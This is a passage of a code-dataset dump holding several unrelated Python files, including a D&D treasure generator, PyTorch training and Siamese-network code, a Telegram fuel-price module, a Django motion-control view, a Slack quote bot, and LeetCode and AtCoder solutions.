90000),\n (\"mantle of spell resistance\", 90000),\n (\"mirror of opposition\", 92000),\n (\"strand of prayer beads, greater\", 95800),\n (\"amulet of mighty fists +4\", 96000),\n (\"eyes of petrification\", 98000),\n (\"bowl of commanding water elementals\", 100000),\n (\"brazier of commanding fire elementals\", 100000),\n (\"censer of controlling air elementals\", 100000),\n (\"stone of controlling earth elementals\", 100000),\n (\"manual of bodily health +4\", 110000),\n (\"manual of gainful exercise +4\", 110000),\n (\"manual of quickness in action +4\", 110000),\n (\"tome of clear thought +4\", 110000),\n (\"tome of leadership and influence +4\", 110000),\n (\"tome of understanding +4\", 110000),\n (\"amulet of the planes\", 120000),\n (\"robe of eyes\", 120000),\n (\"helm of brilliance\", 125000),\n (\"manual of bodily health +5\", 137500),\n (\"manual of gainful exercise +5\", 137500),\n (\"manual of quickness in action +5\", 137500),\n (\"tome of clear thought +5\", 137500),\n (\"tome of leadership and influence +5\", 137500),\n (\"tome of understanding +5\", 137500),\n (\"efreeti bottle\", 145000),\n (\"amulet of mighty fists +5\", 150000),\n (\"chaos diamond\", 160000),\n (\"cubic gate\", 164000),\n (\"iron flask\", 170000),\n (\"mirror of mental prowess\", 175000),\n (\"mirror of life trapping\", 200000)\n )\n\n item_index = (percentage_roll-1)\n\n name = item_tuple[item_index][0]\n base_value = item_tuple[item_index][1]\n\n dct_item[\"name\"] = name\n dct_item[\"value\"] = base_value\n\n return dct_item\n\n\n#-----------------------------------------------------------------------\n#------ Generate One Random Wondrous Item ------------------------------\n#-----------------------------------------------------------------------\n\n\ndef GetOneWondrous(m_type):\n minor = False\n medium = False\n major = False\n\n if string.upper(m_type) == \"MINOR\": minor = True\n elif string.upper(m_type) == \"MEDIUM\": medium = True\n elif string.upper(m_type) == \"MAJOR\": major = True\n\n if minor:\n return GetOneMinorWondrous()\n elif medium:\n return GetOneMediumWondrous()\n elif major:\n return GetOneMajorWondrous()\n\n\n#***********************************************************************\n\n\nif __name__ == \"__main__\":\n crawler.Main()\n","repo_name":"bglaze/crawler-python","sub_path":"crCalc_Treasure_Wondrous.py","file_name":"crCalc_Treasure_Wondrous.py","file_ext":"py","file_size_in_byte":14488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"26981381829","text":"import torch as t\nfrom data import ChallengeDataset\nfrom torch.utils.data import WeightedRandomSampler\nfrom trainer import Trainer\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport model\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport os\nimport random\nimport math\nfrom Sampler import CustomSampler\n\ndef data_split(dataset):\n datalist = dataset.values.tolist()\n c00 = 0\n c01 = 0\n c10 = 0\n c11 = 0\n list00 = []\n list01 = []\n list10 = []\n list11 = []\n\n for data in datalist:\n crack = data[1]\n inact = data[2]\n\n if crack == 0 and inact == 0:\n c00 += 1\n list00.append(data)\n elif crack == 1 and inact == 0:\n c10 += 1\n list10.append(data)\n elif crack == 0 and inact == 1:\n c01 += 1\n list01.append(data)\n else:\n c11 += 1\n list11.append(data)\n\n random.shuffle(list00)\n random.shuffle(list01)\n random.shuffle(list10)\n random.shuffle(list11)\n\n trainnum00 = 0\n trainnum01 = 0\n trainnum10 = 0\n trainnum11 = 0\n\n idx00 = int(round(c00 * 0.75))\n idx01 = int(round(c01 * 0.8))\n idx10 = int(round(c10 * 0.75))\n idx11 = int(round(c11 * 0.8))\n\n testnum00 = idx00\n testnum01 = idx01\n testnum10 = idx10\n testnum11 = idx11\n\n for i in range(1):\n trainlist = list00[:idx00]\n trainnum00 += idx00\n for i in range(1):\n trainlist += list01[:idx01]\n trainnum01 += idx01\n for i in range(1):\n trainlist += list10[:idx10]\n trainnum10 += idx10\n for i in range(1):\n trainlist += list11[:idx11]\n trainnum11 += idx11\n\n testlist = list00[testnum00:]\n testlist += list01[testnum01:]\n testlist += list10[testnum10:]\n testlist += list11[testnum11:]\n\n random.shuffle(trainlist)\n random.shuffle(testlist)\n\n train = pd.DataFrame(trainlist,columns = ['filename', 'crack', 'inactive'])\n test = pd.DataFrame(testlist,columns = ['filename', 'crack', 'inactive'])\n\n print(f\"trainnum00:: {trainnum00}, trainnum01:: {trainnum01}\")\n print(f\"trainnum10:: {trainnum10}, trainnum11:: {trainnum11}\")\n\n q00 = np.ones((trainnum00,2),dtype=int)\n q01 = np.ones((trainnum01,2),dtype=int)\n q10 = np.ones((trainnum10,2),dtype=int)\n q11 = np.ones((trainnum11,2),dtype=int)\n qidx = [0, 0, 0, 0]\n idx = 0\n for data in trainlist:\n if data[1]==0 and data[2]==0:\n q00[qidx[0],1] = int(idx)\n qidx[0] += 1\n elif data[1]==0 and data[2]==1:\n q01[qidx[1],1] = int(idx)\n qidx[1] += 1\n elif data[1]==1 and data[2]==0:\n q10[qidx[2],1] = int(idx)\n qidx[2] += 1\n elif data[1]==1 and data[2]==1:\n q11[qidx[3],1] = int(idx)\n qidx[3] += 1\n idx += 1\n\n qs = [q00, q01, q10, q11]\n ct = [trainnum00, trainnum01, trainnum10, trainnum11]\n\n return train, test, qs, ct\n\ndata = pd.read_csv('./data.csv', sep=';')\n\nres = None\nlearning_rates = [0.0001]\ndropout_rates = [0.5]\nweight_decays = [0.00001]\nmomentums = [0.999]\npatience = [7]\nbatch_size = 32\n\nfor mul in range(100):\n train_data, test_data, qs, ct = data_split(data)\n\n sampler = CustomSampler(qs,(21.5, 0.5, 5.5, 4.5), 'a')\n\n val_dl = t.utils.data.DataLoader(ChallengeDataset(test_data, 'val'), batch_size=batch_size, shuffle = False)\n train_dl = t.utils.data.DataLoader(ChallengeDataset(train_data, 'train'), batch_size=batch_size, shuffle = True)\n #train_dl = t.utils.data.DataLoader(ChallengeDataset(train_data, 'train'), batch_size=batch_size, shuffle = False, sampler = sampler)\n\n for patience_i in patience:\n for weight_decay in weight_decays:\n for dropout_rate in dropout_rates:\n for learning_rate_i in learning_rates:\n for momentum in momentums:\n #mmodel = model.ResNet()\n #mmodel = model.DenseNet()\n #mmodel = model.ResNext()\n #mmodel = model.WideResNet()\n mmodel = model.CustomModel()\n trainer = Trainer(mmodel,\n t.nn.BCELoss(),\n t.optim.Adam(mmodel.parameters(), lr=learning_rate_i, betas=(0.9, momentum),\n eps=1e-08, weight_decay=weight_decay),\n train_dl,\n val_dl,\n #cuda=True,\n cuda=False,\n early_stopping_patience=patience_i, loss_weight = None)\n\n #if os.path.isfile('checkpoints/checkpoint_{:03d}.ckp'.format(0)):\n ##trainer.restore_checkpoint(0)\n\n print(f\"learning_rate_i:: {learning_rate_i:>7f}\")\n res = trainer.fit()\n print(\"\")\n\n# plot the results\nplt.plot(np.arange(len(res[0])), res[0], label='train loss')\nplt.plot(np.arange(len(res[1])), res[1], label='val loss')\nplt.yscale('log')\nplt.legend()\nplt.savefig('losses.png')\n\ndef test_func():\n test_loss = [0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4, 0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4,\n 0.2, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2]\n train_loss = [0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4, 0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4,\n 0.3, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.2, 0.4, 0.4]\n epoch_cnt = 19\n return train_loss, test_loss, epoch_cnt - 1\n","repo_name":"lullulalal/StudyAI","sub_path":"DeepLearnigExersice_FAU/exercise4_material/src_to_implement/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42880024304","text":"# method 1: iterative\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n dummy = tail = ListNode(-1)\n dummy.next = l = r = head\n \n while True:\n count = 0\n while count < k and r:\n count += 1\n r = r.next\n \n if count == k:\n prev, cur = r, l\n for _ in range(k):\n tmp = cur.next\n cur.next = prev\n prev = cur\n cur = tmp\n tail.next = prev\n tail = l\n l = r\n else:\n return dummy.next\n\n# method 2: recursion\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n r = head\n cnt = 0\n while r and cnt < k:\n cnt += 1\n r = r.next\n \n if k <= 1 or cnt < k:\n return head\n \n if cnt == k:\n prev, cur = None, head\n for _ in range(k):\n nxt = cur.next\n cur.next = prev\n prev = cur\n cur = nxt\n head.next = self.reverseKGroup(cur, k)\n return prev\n \n","repo_name":"MengSunS/daily-leetcode","sub_path":"linked_list/25.py","file_name":"25.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"11158570487","text":"__version__ = (0, 0, 2)\n# module by:\n# █▀ █▄▀ █ █░░ █░░ ▀█\n# ▄█ █░█ █ █▄▄ █▄▄ █▄\n\n# █▀▄▀█ █▀▀ █▀█ █░█░█\n# █░▀░█ ██▄ █▄█ ▀▄▀▄▀\n# you can edit this module\n# 2022\n# 🔒 Licensed under the AGPL-3.0\n# 🌐 https://www.gnu.org/licenses/agpl-3.0.html\n# meta developer: @smeowcodes\n# requires: requests beautifulsoup4 tabulate lxml\n# scope: inline\n# meta pic: https://siasky.net/XAArZx4f9mnJtcZpS1M8HSmPgK7xDTDC9NGLCwH9k0mJcQ\n# meta banner: https://siasky.net/fAMzBfMaahm2JTF3ULfrNQHu9R_V5MDP9tiZa-nrVPsqMQ\n\nfrom .. import loader, utils\nfrom telethon.tl.types import Message\nimport requests, random\nfrom bs4 import BeautifulSoup\nfrom tabulate import tabulate\nfrom ..inline.types import InlineQuery\n\n\ndef gassearch():\n response = requests.get(\"https://auto.ria.com/uk/toplivo/\")\n soup = BeautifulSoup(response.text, \"lxml\")\n benz = soup.find_all(\"div\", class_=\"t-row\")\n price = []\n names = [\"A-95+ \", \"A-95 \", \"A-92 \", \"ДП \", \"Газ \"]\n for gasoline in benz:\n a = gasoline.find(\"div\", class_=\"t-cell bold size18\")\n if a:\n price.append(a.get_text() + \"₴\")\n data = [list(gas) for gas in zip(names, price)]\n\n return (\n f\"Паливо Ціна/л{tabulate(data, headers=['', ''])}\"\n )\n\n\nclass GasolineUaMod(loader.Module):\n \"\"\"Gasoline price viewer taken from https://auto.ria.com/uk/toplivo/\"\"\"\n\n strings = {\n \"name\": \"GasolineUa\",\n }\n\n async def lincmd(self, message: Message):\n \"See the price of gasoline\"\n m = random.randint(0, 5)\n if m == 4:\n markup = [[{\"text\": \"💞 More modules\", \"url\": \"https://t.me/smeowcodes\"}]]\n else:\n markup = []\n await self.inline.form(\n message=message,\n text=gassearch(),\n reply_markup=markup,\n )\n\n @loader.inline_everyone\n async def lin_inline_handler(self, query: InlineQuery):\n \"lincmd inline version\"\n return {\n \"title\": \"GasolinPrice\",\n \"description\": \"meow\",\n \"message\": gassearch(),\n }","repo_name":"VitalyaNUZP/ftg","sub_path":"GasolineUa.py","file_name":"GasolineUa.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34957786010","text":"from django.shortcuts import render, redirect\nimport ctypes\nfrom .models import Motion_status\nimport time\nfrom . import consumer\n\n\n# Create your views here.\naxtdll_1 = ctypes.WinDLL('./AXL.dll')\naxtdll_2 = ctypes.WinDLL('./EzBasicAxl.dll')\n\n#axtdll_1.AxmMotLoadParaAll.argtypes\n#각 라이브러리 함수에 대한 파라미터와 반환값 설정\nAxlOpen = axtdll_1['AxlOpen']\nAxlOpen.argtypes = [ctypes.c_long]\nAxlOpen.restype = ctypes.c_ulong\nAxmMotLoadParaAll = axtdll_1['AxmMotLoadParaAll']\nAxmMotLoadParaAll.argtypes = [ctypes.c_char_p]\nAxmMotLoadParaAll.restype = ctypes.c_ulong\nAxmSignalServoOn = axtdll_1['AxmSignalServoOn']\nAxmSignalServoOn.argtypes = [ctypes.c_long, ctypes.c_ulong]\nAxmSignalServoOn.restype = ctypes.c_ulong\nAxmMoveVel = axtdll_1['AxmMoveVel']\nAxmMoveVel.argtypes = [ctypes.c_long, ctypes.c_double, ctypes.c_double, ctypes.c_double]\nAxmMoveVel.restype = ctypes.c_ulong\nAxmMoveEStop = axtdll_1['AxmMoveEStop']\nAxmMoveEStop.argtypes = [ctypes.c_long]\nAxmMoveEStop.restype = ctypes.c_ulong\nAxmStatusGetCmdPos = axtdll_1['AxmStatusGetCmdPos']\nAxmStatusGetCmdPos.argtypes = [ctypes.c_long, ctypes.POINTER(ctypes.c_double)]\nAxmStatusGetCmdPos.restype = ctypes.c_ulong\nAxmStatusGetActPos = axtdll_1['AxmStatusGetActPos']\nAxmStatusGetActPos.argtypes = [ctypes.c_long, ctypes.POINTER(ctypes.c_double)]\nAxmStatusGetActPos.restype = ctypes.c_ulong\nAxmStatusReadVel = axtdll_1['AxmStatusReadVel']\nAxmStatusReadVel.argtypes = [ctypes.c_long, ctypes.POINTER(ctypes.c_double)]\nAxmStatusReadVel.restype = ctypes.c_ulong\nAXT_RT_SUCCESS = 0\nstat = 0\nAxlOpen(7)\nAxmMotLoadParaAll(b'MotionDefault_1.mot')\nc_cPosition = ctypes.c_double(0)\nc_aPosition = ctypes.c_double(0)\nc_dVel = ctypes.c_double(0)\n\ndef index(request):\n global stat\n stat = 0\n return render(request, 'ctrl/view_1.html')\n\ndef content(request):\n global selected_axis\n global velo\n global accel\n working = ''\n if stat == 0:\n selected_axis = request.POST.get('axisnum')\n velo = request.POST.get('vel')\n accel = request.POST.get('accel')\n # global selected_axis = int(selected_axis_str)\n AxmSignalServoOn(int(selected_axis), True)\n #message.submit('서보켜짐')\n working = 'servo on'\n context = {'status': working, 'axis': selected_axis, 'accel': accel}\n return render(request, 'ctrl/view_2.html', context)\n\ndef motOff(request):\n AxmSignalServoOn(int(selected_axis), False)\n return redirect('AXTctrl:index')\n\ndef movEstop():\n AxmMoveEStop(int(selected_axis))\n\ndef movVel():\n AxmMoveVel(int(selected_axis), int(velo), int(accel), int(accel))\n\n #consumer.ChatConsumer().submit(message)\n\ndef re_status():\n AxmStatusGetCmdPos(int(selected_axis), ctypes.byref(c_cPosition))\n AxmStatusGetActPos(int(selected_axis), ctypes.byref(c_aPosition))\n AxmStatusReadVel(int(selected_axis), ctypes.byref(c_dVel))\n cPosition = c_cPosition.value\n aPosition = c_aPosition.value\n dVel = c_dVel.value\n return cPosition, aPosition, dVel\n\n'''\ndef store_status(request, text_data):\n #status = Motion_status.objects.get(id=1)\n cPosition = None\n aPosition = None\n dVel = None\n status = None\n AxmStatusGetCmdPos(int(selected_axis), ctypes.byref(cPosition))\n AxmStatusGetActPos(int(selected_axis), ctypes.byref(aPosition))\n AxmStatusReadVel(int(selected_axis), ctypes.byref(dVel))\n i = 0\n if i == 0:\n status = Motion_status(cmdPos=cPosition, actPos=aPosition, cmdVel=dVel)\n status.save()\n else:\n status.cmdPos = cPosition\n status.actPos = aPosition\n status.cmdVel = dVel\n status.save()\n text_data = Motion_status.objects.get(id=1)\n context = {'text_data': text_data}\n'''\n\n\n\n\n\n","repo_name":"wonjunJ/AXT_webCtrl","sub_path":"AXTproject/AXTctrl/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"7175915123","text":"import datetime\nimport logging\nimport sys\nfrom io import BytesIO\nfrom typing import Optional\nfrom urllib.parse import quote_plus\n\nfrom quotes_slackbot.config import config\nfrom quotes_slackbot.image.assemble import assemble_image_and_text\nfrom quotes_slackbot.ml.glide import run_for_prompt\nfrom quotes_slackbot.ml.gpt3 import query_gpt3\nfrom quotes_slackbot.slack.slack_client import (SingleMessageSlackClient,\n slack_markdown_block)\n\nlogger = logging.getLogger(__name__)\n\n\ndef run(quote: Optional[str] = None, motive: Optional[str] = None):\n dt_start = datetime.datetime.now()\n\n logger.info(f\"Slack channel ID: {config.channel_id}\")\n\n slack = SingleMessageSlackClient(\n token=config.slack_token,\n channel_id=config.channel_id,\n )\n\n if config.send_post_preview:\n slack.put(\n text=config.post_preview,\n blocks=[slack_markdown_block(config.post_text_working)],\n )\n\n try:\n if not quote or not motive:\n motive, quote = fetch_quote_and_motive()\n\n if not quote or not motive:\n logger.error(\"Retries exceeded to obtain quote and motive\")\n return\n\n logger.info(f\"quote: {quote}\")\n logger.info(f\"motive: {motive}\")\n\n image = run_for_prompt(motive)\n\n image_and_quote = assemble_image_and_text(image=image, text=quote)\n\n slack.delete()\n img_byte_arr = BytesIO()\n image_and_quote.save(img_byte_arr, format=\"PNG\")\n img_byte_arr = img_byte_arr.getvalue()\n blocks = [slack_markdown_block(config.post_text_done)]\n slack.put(file_content=img_byte_arr, text=config.post_preview, blocks=blocks)\n\n duration = datetime.datetime.now() - dt_start\n duration_str = (\n f\"{int(duration.total_seconds() // 60)} min \"\n f\"{int(duration.total_seconds()) % 60} s\"\n )\n escaped_query = quote_plus(f'\"{quote}\"')\n url = \"https://www.google.com/search?q=\" + escaped_query\n details_post = \"\\n\".join(\n [\n \"_Quote and image have been generated by neural networks_ \",\n \"\",\n f\"*Image theme*: {motive}\",\n \"\",\n f\"*Text quote*: {quote}\",\n \"\",\n f\"*Generation time*: {duration_str}\",\n \"\",\n f\"*Who said it?* <{url}|Google>\",\n ]\n )\n\n slack.append_to_thread(\n text=config.thread_post_preview, blocks=[slack_markdown_block(details_post)]\n )\n except Exception as e:\n slack.delete()\n logger.exception(e)\n\n\ndef fetch_quote_and_motive():\n motive, quote = None, None\n for _ in range(config.gpt3_retries):\n result = query_gpt3(config.gpt3_prompt)\n if config.gpt3_delimiter not in result:\n logger.info(f\"Skipping: {result}\")\n continue\n parts = result.split(config.gpt3_delimiter)\n if len(parts) == 2 and len(parts[0]) > 15 and len(parts[1]) > 5:\n quote, motive = parts\n break\n else:\n logger.info(f\"Skipping: {result}\")\n return motive, quote\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n if len(sys.argv) == 3:\n quote = sys.argv[1]\n motive = sys.argv[2]\n print(f\"received: {quote}\")\n print(f\" {motive}\")\n run(quote=quote, motive=motive)\n else:\n run()\n","repo_name":"sg10/quotes-slackbot","sub_path":"src/quotes_slackbot/quote_generator.py","file_name":"quote_generator.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9164137243","text":"import yaml\nimport os\nfrom database import *\n\nlocales = {}\n\nclass locale():\n dictionary = []\n def __init__(self, locale = 'en_US', branch = None):\n query = locales.get(locale)\n if branch is not None:\n self.dictionary = branch \n elif query is None:\n self.load(locale) \n else:\n self.dictionary = query\n\n def load(self, locale = 'en_US'):\n with open(f'localisation/{locale}.yml', 'r') as stream:\n locales[locale] = yaml.safe_load(stream)\n self.dictionary = locales[locale]\n\n def get(self, key='lorem_ipsum'):\n branch = self.dictionary.get(key, key)\n if type(branch) is dict: new = locale(branch = branch)\n else: new = branch\n return new\n","repo_name":"RUMBlk/VibinBot","sub_path":"localisation.py","file_name":"localisation.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"3218723481","text":"\"\"\"\n构建孪生神经网络\n\"\"\"\n# 1.embedding\n# 2.GRU\n# 3.attention\n# 4.attention concate GRU output\n# 5.GRU\n# 6.pooling\n# 7.DNN\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nimport config\n\n\nclass Siamese(nn.Module):\n def __init__(self):\n super().__init__()\n self.embedding = nn.Embedding(num_embeddings=len(config.sort_ws),\n embedding_dim=config.sort_embedding_dim,\n padding_idx=config.sort_ws_padding_index)\n self.gru1 = nn.GRU(input_size=config.sort_embedding_dim, hidden_size=config.sort_hidden_size,\n num_layers=config.sort_num_layers, batch_first=config.sort_batch_first,\n bidirectional=config.sort_bidirectional, dropout=config.sort_dropout)\n self.gru2 = nn.GRU(input_size=config.sort_hidden_size * config.sort_num_directions * 2,\n hidden_size=config.sort_hidden_size,\n num_layers=1,\n batch_first=config.sort_batch_first,\n bidirectional=False)\n self.dnn = nn.Sequential(\n nn.Linear(config.sort_num_directions * config.sort_hidden_size * 4, config.sort_linear_size),\n nn.ELU(inplace=True),\n nn.BatchNorm1d(config.sort_linear_size),\n nn.Dropout(config.sort_dropout),\n\n nn.Linear(config.sort_linear_size, config.sort_linear_size),\n nn.ELU(inplace=True),\n nn.BatchNorm1d(config.sort_linear_size),\n nn.Dropout(config.sort_dropout),\n\n nn.Linear(config.sort_linear_size, 2),\n )\n\n def forward(self, input1, input2):\n \"\"\"\n :param input1: [batch_size, seq_len]\n :param input2: [batch_size, seq_len]\n :return:\n \"\"\"\n # 构造两个mask矩阵,位置为pad的地方值为1,位置不为pad的地方值为0\n mask1, mask2 = input1.eq(config.sort_ws_padding_index), input2.eq(config.sort_ws_padding_index)\n input1 = self.embedding(input1) # [batch_size, seq_len1, embedding_dim]\n input2 = self.embedding(input2) # [batch_size, seq_len2, embedding_dim]\n # 第一次GRU\n # 这里设置了batch_first = True\n # output1 [batch_size, seq_len1, num_directions*hidden_size]\n # hidden_state [num_layers*num_directions,batch_size, hidden_size]\n output1, hidden_state1 = self.gru1(input1)\n output2, hidden_state2 = self.gru1(input2)\n # 注意力\n output1_align, output2_align = self.soft_attention_align(output1, output2, mask1, mask2)\n # 拼接\n output1 = torch.cat([output1, output1_align], dim=-1) # [batch_size, seq_len, num_directions*hidden_size*2]\n output2 = torch.cat([output2, output2_align], dim=-1) # [batch_size, seq_len, num_directions*hidden_size*2]\n # 第二次GRU\n # 这里也设置了batch_first = True\n # output1 [batch_size, seq_len1, num_directions*hidden_size]\n # hidden_state [num_layers*num_directions,batch_size, hidden_size]\n gru2_output1, gru2_hidden_state1 = self.gru2(output1)\n gru2_output2, gru2_hidden_state2 = self.gru2(output2)\n # 池化\n # [batch_size, 2*num_directions*hidden_size]\n output1_pooled = self.apply_pooling(gru2_output1)\n output2_pooled = self.apply_pooling(gru2_output2)\n # [batch_size, 4*num_directions*hidden_size]\n out = torch.cat([output1_pooled, output2_pooled], dim=-1)\n out = self.dnn(out) # [batch_size, 2]\n return F.softmax(out, dim=-1)\n\n @staticmethod\n def apply_pooling(output):\n # 将窗口大小设为句长,相当于对整个句子取均值或最大值,达到n_gram的效果, seq_len维度变为1\n # [batch_size, num_directions*hidden_size]\n avg_pooled = F.avg_pool1d(output.transpose(1, 2), kernel_size=output.size(1)).squeeze()\n max_pooled = F.max_pool1d(output.transpose(1, 2), kernel_size=output.size(1)).squeeze()\n\n # [batch_size, 2*num_directions*hidden_size]\n return torch.cat([avg_pooled, max_pooled], dim=1)\n\n @staticmethod\n def soft_attention_align(x1, x2, mask1, mask2):\n \"\"\"\n 实现attention\n :param x1 [batch_size, seq_len_1, num_directions*hidden_size]\n :param x2 [batch_size, seq_len_2, num_directions*hidden_size]\n :param mask1 [batch_size, seq_len_1]\n :param mask2 [batch_size, seq_len_2]\n :return output1_align [batch_size, seq_len_2, num_directions*hidden_size]\n :return output2_align [batch_size, seq_len_1, num_directions*hidden_size]\n \"\"\"\n # 将mask中值为1的地方(即所有的pad)转成-inf,这样在运算时pad就没什么用了\n mask1 = mask1.float().masked_fill_(mask1, float(\"-inf\"))\n mask2 = mask2.float().masked_fill_(mask2, float(\"-inf\"))\n # 1.attention weight\n # 2.attention_weight * output\n # x2.permute(2,1) [batch_size, num_directions*hidden_size, seq_len_2]\n # mask2.unsqueeze(1) [batch_size, 1, seq_len_2]\n # 这里把x2当作encoder x1当作decoder\n # decoder 和 encoder 运算后再softmax得到attention weight\n # attention weight再和encoder运算得到context vector\n x1_attention_energy = x1.bmm(x2.permute(0, 2, 1)) # [batch_size, seq_len_1, seq_len_2]\n x1_attention_weight = F.softmax(x1_attention_energy + mask2.unsqueeze(1), dim=-1)\n output2_align = x1_attention_weight.bmm(x2) # [batch_size, seq_len_1, num_directions*hidden_size]\n\n # 把x1当encoder 原理同上\n x2_attention_energy = x1_attention_energy.permute(0, 2, 1) # [batch_size, seq_len_2, seq_len_1]\n x2_attention_weight = F.softmax(x2_attention_energy + mask1.unsqueeze(1), dim=-1)\n output1_align = x2_attention_weight.bmm(x1) # [batch_size, seq_len_2, num_directions*hidden_size]\n return output1_align, output2_align\n","repo_name":"kenzzuli/chat_service","sub_path":"dnn/sort/siamese.py","file_name":"siamese.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70830294566","text":"import os\nfrom flask import Flask\nfrom dotenv import load_dotenv\nload_dotenv()\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\n\nsecret = os.getenv('SECRET_KEY')\nprint(secret)\n\n@app.route('/')\ndef index():\n return \"Hello world\"\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Tukkis/TreeniApp","sub_path":"treeni-app-back/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35717512024","text":"from db.db import singleton_ScrubDB\r\nfrom db.db import singleton_ResultsDB\r\n\r\ndef getResultsTableRows(tableName):\r\n if singleton_ResultsDB.table_exists(tableName):\r\n singleton_ResultsDB.cursor.execute('select * from {}'.format(tableName))\r\n rows = singleton_ResultsDB.cursor.fetchall()\r\n singleton_ResultsDB.connect.commit()\r\n return rows\r\n return []\r\n\r\n\r\ndef getScrubTableRows(tableName):\r\n if singleton_ScrubDB.table_exists(tableName):\r\n singleton_ScrubDB.cursor.execute('select * from {}'.format(tableName))\r\n rows = singleton_ScrubDB.cursor.fetchall()\r\n singleton_ScrubDB.connect.commit()\r\n return rows\r\n print('table[', tableName, '] not exist in scrub')\r\n return []\r\n\r\n\r\ndef compareTwoTable(table1, table2):\r\n rows_table1 = getResultsTableRows(table1)\r\n rows_table2 = getResultsTableRows(table2)\r\n exKeys = ['id', 'updateTime']\r\n # print(rows_table1[0].keys())\r\n diffrent_dict = {} # key & [{raceInfo}]\r\n for row_2 in rows_table2:\r\n if row_2['horse_no'] >= 1000:\r\n continue\r\n race_date = row_2['race_date']\r\n race_no = row_2['race_no']\r\n horse_no = row_2['horse_no']\r\n # print('\\n', race_date, race_no, horse_no)\r\n find = False\r\n for row_1 in rows_table1:\r\n if (row_1['race_date'] == race_date) and (row_1['race_no'] == race_no) and (row_1['horse_no'] == horse_no):\r\n find = True\r\n keys = row_1.keys()\r\n for key in keys:\r\n if key in exKeys:\r\n continue\r\n elif row_1[key] != row_2[key]:\r\n if key not in diffrent_dict.keys():\r\n diffrent_dict[key] = []\r\n info_dict = {}\r\n info_dict['race_date'] = race_date\r\n info_dict['race_no'] = race_no\r\n info_dict['horse_no'] = horse_no\r\n info_dict['table1'] = row_1[key]\r\n info_dict['table2'] = row_2[key]\r\n diffrent_dict[key].append(info_dict)\r\n # print('\\n', race_date, race_no, horse_no)\r\n # print('not same:', race_date, race_no, horse_no, ' key:', key, ' table1:', row_1[key], ' table2:', row_2[key])\r\n break\r\n if not find:\r\n # if 20190224 == row_2['race_date']:\r\n # pass\r\n # else:\r\n print(\"data can't find in[\", table1, ']:', race_date, race_no, horse_no)\r\n print('keys:', diffrent_dict.keys())\r\n for key, array in diffrent_dict.items():\r\n for dif in array:\r\n print(key, dif)\r\n\r\n\r\ncompareTwoTable('table_dragon_history_model5', 'table_dragon_history_model5_7_14')\r\n\r\n","repo_name":"JudyPhy/spider","sub_path":"20190413/CheckData/compare_two_tables.py","file_name":"compare_two_tables.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32438243317","text":"# n = int(input())\r\n# a, b, c = map(int, input().split())\r\n# A = list(map(int, input().split()))\r\n\r\n#A\r\nn = input()\r\nprint(n.zfill(4))\r\n\r\n#B\r\np= int(input().split()[-1])\r\nprint(sum([int(a)

    j:\r\n pass\r\n elif j <= k_max:\r\n now[j] = prev[j]\r\n else:\r\n now[j] = prev[k_max]\r\n\r\n prev = defaultdict(int)\r\n num = 0\r\n for k, v in now.items():\r\n num = (num + v) % large\r\n prev[k] = num\r\n\r\nans = 0\r\nfor cnt in now.values():\r\n ans = (ans + cnt) % large\r\nprint(ans)\r\n\r\n#E\r\n\r\nlarge = 998244353","repo_name":"KazuhideMimura/AtCoder","sub_path":"ABC/ABC222.py","file_name":"ABC222.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22640157725","text":"from django.urls import path\nfrom restrito import views\n\napp_name = 'restrito'\n\nurlpatterns = [\n path('lista-atividades', views.listar_atividades, name='lista-atividades'),\n path('cadastrar-atividade', views.cadastrar_atividade, name='cadastrar-atividade'),\n path('alterar-atividade/', views.alterar_atividade, name='alterar-atividade'),\n path('excluir-atividade/', views.excluir_atividade, 